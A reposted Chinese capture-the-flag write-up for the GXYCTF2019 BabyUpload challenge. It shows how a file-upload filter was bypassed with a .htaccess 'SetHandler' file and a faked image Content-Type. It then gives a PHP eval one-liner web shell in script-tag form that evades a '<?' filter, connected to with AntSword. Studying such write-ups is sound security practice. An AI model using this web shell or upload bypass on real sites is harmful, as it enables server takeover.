其他分享
首页 > 其他分享> > [GXYCTF2019]BabyUpload

[GXYCTF2019]BabyUpload

作者:互联网

[GXYCTF2019]BabyUpload

1,先上传个php文件试试,提示后缀名不能有ph

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-jMt7sDbO-1630736371841)(https://i.loli.net/2021/09/02/xdRGkTB8hNcInwg.png)]

2,上传个.htaccess文件试试,提示上传类型也太露骨了吧

.hatccess文件内容:

SetHandler application/x-httpd-php

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-a1o5MtR4-1630736371858)(https://i.loli.net/2021/09/02/g6CxLHwDAVOIkSc.png)]

3,换个文件类型,换成image/jpeg,上传成功!

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-WywlTtXU-1630736371862)(https://i.loli.net/2021/09/02/qV6Re1TN9zSpwjc.png)]

接下来只需要上传一个带有一句话木马的png/jpg文件就行。

  1. (。。还有)对文件内容进行了过滤,猜测过滤了<?

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-VH8z2iDy-1630736371865)(https://i.loli.net/2021/09/02/VJ7lU2AogXT9mjw.png)]

6,可以使用<script language="php">eval($_POST['mochu7']);</script>绕过

在这里插入图片描述

7,上传成功,链接蚁剑获得flag

标签:文件,BabyUpload,过滤,php,上传,GXYCTF2019
来源: https://blog.csdn.net/qq_51684648/article/details/120099494